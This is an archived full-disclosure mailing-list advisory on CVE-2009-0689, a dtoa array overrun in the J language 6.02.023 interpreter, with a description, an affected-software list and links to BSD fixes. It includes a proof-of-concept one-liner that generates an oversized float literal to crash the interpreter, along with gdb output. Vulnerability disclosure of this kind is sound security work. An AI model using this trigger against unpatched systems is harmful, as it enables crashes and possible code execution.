Main Archive Page > Month Archives  > full-disclosure-uk archives

[Full-disclosure] J 6.02.023 Array Overrun (code execution)

From: Maksymilian Arciemowicz <cxib_at_nospam>
Date: Fri Jan 08 2010 - 00:18:45 GMT
To: full-disclosure@lists.grok.org.uk

[ J 6.02.023 Array Overrun (code execution) ]

Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com
Date:
- Dis.: 07.05.2009

• Pub.: 08.01.2010

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- J 6.02.023 Array Overrun (code execution)

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/79

• 0.Description --- The J programming language, developed in the early 1990s by Ken Iverson and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL function-level languages created by John Backus.

To avoid repeating the APL special character problem, J requires only the basic ASCII character set, resorting to the use of digraphs formed using the dot or colon characters to extend the meaning of the basic characters available. Additionally, to keep parsing and the language simple, and to compensate for the lack of character variation in ASCII, J treats many characters which might need to be balanced in other languages (such as [] {} "" `` or <>) as stand alone tokens or (with digraphs) treats them as part of a multi-character token.

Being an array programming language, J is very terse and powerful, and is most suited to mathematical and statistical programming, especially when performing operations on matrices. J is a MIMD language.

• 1. J 6.02.023 Array Overrun (code execution) --- The main problem exist in dtoa implementation. J has the same dtoa as MatLab, OpenBSD, MacOS, Google, Opera etc. and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array.

• 2. Proof of Concept (PoC) --- There are several ways to make a successful attack. Simplest assumed the creation of a script with a defective floating-point variable and execution it. This will allow the possibility of code execution.

-expl.ijs----------------------

cxib=0.<?php echo str_repeat("1",296450); ?>
-expl.ijs----------------------

Program received signal SIGSEGV, Segmentation fault. 0x00452157 in ?? () eax 0x4c2000 4988928 ecx 0x2c667c 2909820 edx 0x46d054 4640852 ebx 0x48a607 296455 esp 0x98f720 0x98f720 ebp 0x98f77c 0x98f77c esi 0x4363808 70662152 edi 0x0 0 eip 0x452157 0x452157 eflags 0x10206 [ PF IF RF ] cs 0x1b 27 ss 0x23 35 ds 0x23 35 es 0x23 35 fs 0x3b 59 gs 0x0 0

edi=0

(gdb) x/i $eip
0x452157: test %eax,(%eax)
(gdb) x/x $eax
0x4c2000: 0x00000000

• 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in:
  - OpenBSD
  
  • NetBSD
  • FreeBSD
  • MacOSX
  • Google Chrome
  • Mozilla Firefox
  • Mozilla Seamonkey
  • Mozilla Thunderbird
  • Mozilla Sunbird
  • Mozilla Camino
  • KDE (example: konqueror)
  • Opera
  • K-Meleon
  • F-Lock
  • MatLab
  • J

This list is not yet closed.

• 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c

• 5. Credits --- Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.
• 6. Greets --- Infospec p_e_a pi3
• 7. Contact --- Email:
  - cxib {a.t] securityreason [d0t} com
  
  • sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

• http://securityreason.com/key/sp3x.gpg

http://securityreason.com/ http://securityreason.com/exploit_alert/ - Exploit Database http://securityreason.com/security_alert/ - Vulnerability Database

_______________________________________________ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

• This message: [ Message body ]
• Next message: Maksymilian Arciemowicz: "[Full-disclosure] Matlab R2009b Array Overrun (code execution)"
• Previous message: Carlos: "Re: [Full-disclosure] Facebook Query Language (FQL) security issue"

• Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ]